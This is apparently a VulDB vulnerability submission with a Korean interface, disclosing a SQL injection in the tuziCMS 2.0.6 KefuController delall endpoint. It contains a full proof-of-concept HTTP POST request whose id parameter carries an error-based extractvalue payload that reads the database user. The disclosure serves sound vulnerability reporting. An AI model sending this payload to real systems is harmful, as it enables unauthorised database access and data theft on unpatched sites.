| 제목 | tuziCMS 2.0.6 \App\Manage\Controller\KefuController.class.php has SQLinject |
|---|
| 설명 | Because the security syntax of thinkphp framework is not used here,
and $id is used to splice the $where variable for query,
resulting in a serious SQL injection vulnerability.
May cause serious harm to the system.
Exploit poc is:
`POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: x.x.x.x
x-originating-ip: x.x.x.x
x-remote-ip: x.x.x.x
x-remote-addr: x.x.x.x
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
id=1//and//(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
|
|---|
| 원천 | ⚠️ https://github.com/yeyinshi/tuzicms/issues/13 |
|---|
| 사용자 | Evilmu1 (UID 38763) |
|---|
| 제출 | 2023. 01. 12. AM 08:02 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 01. 12. PM 03:49 (8 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 218152 [TuziCMS 2.0.6 KefuController.class.php delall 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|